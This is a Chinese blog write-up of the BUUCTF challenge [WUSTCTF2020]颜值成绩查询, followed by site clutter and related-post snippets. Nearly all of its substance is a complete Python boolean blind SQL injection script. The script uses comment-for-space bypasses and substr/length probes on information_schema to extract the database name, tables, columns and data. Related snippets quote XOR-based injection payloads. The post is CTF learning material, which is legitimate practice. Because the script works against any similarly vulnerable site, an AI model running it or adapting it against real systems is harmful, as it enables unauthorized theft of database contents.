[WUSTCTF2020]颜值成绩查询

最新推荐文章于 2024-04-26 21:09:14 发布
最新推荐文章于 2024-04-26 21:09:14 发布
阅读量139 收藏 1
点赞数
分类专栏: BUUCTF 文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yb_140/article/details/127659665
版权

输入1,2,3,4,5是有回显的

5之后就是  student number not exists.

推测是盲注

脚本:

import requests
import time


# 获取数据库信息
def get_db_info(strings, url, success):
    db_length = 1
    now_db_length = 1
    while db_length > 0:
        get_db_url = url + '/**/and/**/length(database())=' + str(db_length) + '#'
        result = requests.get(get_db_url).content.decode('utf-8')
        if success in result:
            print('数据库长度为:' + str(db_length))
            break
        db_length = db_length + 1
    db_name = ''
    while now_db_length < db_length + 1:
        for one_char in strings:
            get_db_url = url + '/**/and/**/substr(database(),' + str(now_db_length) + ',1)=%27' + one_char + '%27#'
            result = requests.get(get_db_url).content.decode('utf-8')
            if success in result:
                db_name = db_name + one_char
                break
        now_db_length = now_db_length + 1
        print("\r", end="")
        print('数据库名字为:' + db_name, end='')
    return db_name


# 获取数据库内表的信息
def get_table_info(strings, url, success, db_name):
    table_names = []
    table_num = 0
    while table_num >= 0:
        get_table_url = url + '/**/and/**/length((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema=%27' + db_name + '%27/**/limit/**/' + str(
            table_num) + ',1))>0--+'
        result = requests.get(get_table_url).content.decode('utf-8')
        if success in result:
            table_num = table_num + 1
        else:
            break
    print('数据库内表的数量为:' + str(table_num))
    # 获得表的数量,但是需要+1,然后依次获取每个表的名称长度
    now_table_num = 0
    while now_table_num < table_num:
        length = 1
        while length > 0:
            get_table_url = url + '/**/and/**/length((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema=%27' + db_name + '%27/**/limit/**/' + str(
                now_table_num) + ',1))=' + str(length) + '--+'
            result = requests.get(get_table_url).content.decode('utf-8')
            if success in result:
                break
            length = length + 1
        now_length = 1
        table_name = ''
        while now_length < length + 1:
            # 添加for循环获取字符
            for one_char in strings:
                get_table_url = url + '/**/and/**/substr((select/**/ table_name/**/from/**/information_schema.tables/**/where/**/table_schema=%27' + db_name + '%27/**/limit/**/' + str(
                    now_table_num) + ',1),' + str(now_length) + ',1)=%27' + one_char + '%27--+'
                result = requests.get(get_table_url).content.decode('utf-8')
                time.sleep(0.1)
                if success in result:
                    table_name = table_name + one_char
                    print("\r", end="")
                    print('表' + str(now_table_num + 1) + '名字为:' + table_name, end='')
                    break
            now_length = now_length + 1
        print('')
        table_names.append(table_name)
        # 开始指向下一个表
        now_table_num = now_table_num + 1
    return table_names


# 通过表名来获取表内列的信息,在必要的时候可以修改sql语句,通过db_name限制
def get_column_info(strings, url, success, db_name, table_names):
    # 开始获取第一个表内的列
    for i in range(0, len(table_names)):
        column_names = []
        column_num = 0
        # 获取第一个表内列的数量
        while column_num >= 0:
            get_column_url = url + '/**/and/**/length((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name=%27' + str(
                table_names[i]) + '%27/**/limit/**/' + str(column_num) + ',1))>0--+'
            result = requests.get(get_column_url).content.decode('utf-8')
            if success in result:
                column_num = column_num + 1
            else:
                print(str(table_names[i]) + '表的列数量为:' + str(column_num))
                for now_column_num in range(0, column_num):
                    length = 1
                    while length >= 0:
                        get_column_url = url + '/**/and/**/length((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name=%27' + str(
                            table_names[i]) + '%27/**/limit/**/' + str(now_column_num) + ',1))=' + str(length) + '--+'
                        result = requests.get(get_column_url).content.decode('utf-8')
                        if success in result:
                            # 获取列明
                            now_length = 1
                            column_name = ''
                            # for one_char in strings:
                            while now_length < length + 1:
                                for one_char in strings:
                                    get_column_url = url + '/**/and/**/substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name=%27' + str(
                                        table_names[i]) + '%27/**/limit/**/' + str(now_column_num) + ',1),' + str(
                                        now_length) + ',1)=%27' + str(one_char) + '%27--+'
                                    result = requests.get(get_column_url).content.decode('utf-8')
                                    if success in result:
                                        column_name = column_name + str(one_char)
                                        now_length = now_length + 1
                                        print("\r", end="")
                                        print('第' + str(now_column_num + 1) + '列的名称为:' + column_name, end='')
                                        break
                            column_names.append(column_name)
                            print('')
                            break
                        else:
                            length = length + 1
                break
        # 读取第表内的数据
        get_data(strings, url, success, db_name, table_names[i], column_names)


# 定义读取表内数据的函数
def get_data(strings, url, success, db_name, table_names, column_names):
    print('开始获取表内数据------------------------------------------')
    # for i in range(0, len(table_names)):
    for k in range(0, len(column_names)):
        # 判断是否存在第k列
        row = 0
        while row >= 0:
            get_data_url = url + '/**/and/**/length((select/**/' + str(column_names[k]) + '/**/from/**/' + str(
                table_names) + '/**/limit/**/' + str(row) + ',1))>0--+'
            result = requests.get(get_data_url).content.decode('utf-8')
            if success in result:
                row = row + 1
                # 如果存在此列,就判断此列的数据长度
                length = 0
                while length >= 0:
                    get_data_url = url + '/**/and/**/length((select/**/' + str(
                        column_names[k]) + '/**/from/**/' + str(table_names) + '/**/limit/**/' + str(
                        row - 1) + ',1))=' + str(length) + '--+'
                    result = requests.get(get_data_url).content.decode('utf-8')
                    if success in result:
                        # 获得数据的长度
                        break
                    else:
                        length = length + 1
                # 获取此列的数据内容
                now_length = 1
                data = ''
                while now_length < length + 1:
                    for one_char in strings:
                        get_data_url = url + '/**/and/**/substr((select/**/' + str(
                            column_names[k]) + '/**/from/**/' + str(table_names) + '/**/limit/**/' + str(
                            row - 1) + ',1),' + str(now_length) + ',1)=%27' + str(one_char) + '%27--+'
                        result = requests.get(get_data_url).content.decode('utf-8')
                        if success in result:
                            data = data + one_char
                            print("\r", end="")
                            print(column_names[k] + '列的第' + str(row) + '行数据为:' + data, end='')
                            break
                    now_length = now_length + 1
            else:
                break
        print('')


if __name__ == '__main__':
    strings = 'abcdefghijklmnopqrstuvwxyz1234567890_{}-~'
    url = 'http://950c9fa8-9923-4e9c-bdcb-8a196279c735.node4.buuoj.cn:81/?stunum=1'
    success = 'your score is: 100'
    print('可以获取数据库内全部表的信息,但获取当前表的值需要修改success值')
    print('失败结果是一致的,可以修改为success为失败的值,则可以获取当前表数据')
    print('开始获取数据库信息---------------------------------------')
    db_name = get_db_info(strings, url, success)
    print('\n开始获取数据库内表信息------------------------------------')
    table_names = get_table_info(strings, url, success, db_name)
    print('开始获取表结构信息-----------------------------------------')
    get_column_info(strings, url, success, db_name, table_names)
    print('获取表数据信息结束-----------------------------------------')

超级兵_140
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf-颜值成绩查询(sql注入)
一直在水些技术小文
05-19 558
输入1-4都是可以的,从5开始就不存在了 多半就是sql注入,但是限制了输入的数据,就只能用报错注入或者盲注了 但尝试后发现,报错注入、布尔盲注和时间盲注都不行,都回显not exists 尝试一下异或注入 输入10正确,1错误,说明是异或注入 1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),1,1))=105)^1 这是正确的结果 错误的结果是这样的 通过这个可以最终得到f..
[WUSTCTF2020]颜值成绩查询(布尔注入)
记录学习,一起进步
01-27 766
[WUSTCTF2020]颜值成绩查询(布尔注入)
bugku ctf 成绩查询 解题思路
YouthBelief的博客
03-08 1072
0x00 环境地址 https://ctf.bugku.com/challenges/detail/id/84.html 成绩查询 大概率sql注入 0x01 解题思路 1.1 根据提示输入1 2 3 测试正常数据 1 2 看来是根据id查询 1.2 测试是否报错(不产生报错) ' " ') ") % %) )) 等等 1.3 猜测sql语句为 select Math_score,English_score,Chinese_score from score_table where
CTF——web安全(六)
最新发布
qq_45215609的博客
04-26 350
CTF——web安全(六) 题目一:成绩查询
buuctf-[WUSTCTF2020]颜值成绩查询
2202_75317918的博客
10-01 473
当输入的学号不存在时,只会返回“student number not exists.”。猜测是盲注题,因为看不见其他的回显信息,初步想法是构造值为1或0的表达式来进行探测。发现功能就是输入一个学号,然后返回对应的成绩,就是一个简单的查询操作。如果不采用二分法,会跑的很慢。打开环境,随便输个1看看。
re学习笔记(56)WUSTCTF – Re方向WP
12-21
文章以一系列WUSTCTF逆向工程挑战为例,展示了如何利用逆向工程技术来解密和获取隐藏的flag。 首先,让我们看看WUSTCTF的"re-Cr0ssFun"挑战。在这个问题中,作者使用了IDA64(Interactive Disassembler)来加载64位...
linux操作系统入门实验报告
03-09
**Linux操作系统入门实验报告** 本实验报告主要针对Linux操作系统的基础知识和操作技能进行阐述,旨在帮助初学者快速熟悉这一开源操作系统。实验过程中,我们将通过实际操作来了解和掌握Linux的基本命令行界面,...
Flash8help_cn.part4
01-13
Flash8help_cn.part4.共有6卷,须全部下载才能解压缩。flash 教程 帮助文档 动漫 计算机
23种设计模式汇集       
07-09
比较系统的讲解了软件设计的23种设计模式,各种例子都有
BUGKU CTF--web 基础{成绩查询}
lulu001128的博客
12-03 860
BUGKU CTF--web 基础{成绩查询}解题过程
SQL布尔盲注 —— 【WUST-CTF2020】颜值成绩查询
Ve99tr’s Blog
03-30 1902
sql布尔盲注
BUUCTF WEB 颜值成绩查询
qq_41696858的博客
03-01 259
一个查询窗口,很直观的感受是SQL注入,本着这个思路,测试0,1,2,3,4,5 发现0和5都是doesn’t exists,这里就可以利用布尔盲注来进行0,1的判断,下面就是过滤字的判断 由于只是布尔判断,所以没有办法判断是单引号闭合还是双引号闭合,or和and也不能判断出来,空格被过滤了是在后面爆表名的时候判断出来的 在尝试1^1的时候发现回显doesn’t exists,那么这个payload就是没问题的,下面就是判断过程了 1^if(length(database())>0,1,0)回显doe
buuoj WUSTCTF2020颜值成绩查询
pondzhang的专栏
04-18 383
经过测试判断为盲注,编译脚本如下: import requests #database length def get_database_length(): count = 0 while(1): url = "http://de626b0f-7c67-4a3f-b657-89451b2a9923.node3.buuoj.cn/?stunum=0^(length(...
[WUSTCTF2020]朴实无华
09-19
[WUSTCTF2020]朴实无华是一道CTF比赛的题目。根据给出的代码,该题目包含三个关卡。在第一个关卡中,如果传入的参数$num的整数值小于2020且大于2021,会输出一条特定的字符串。在第二个关卡中,如果传入的参数$md5的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值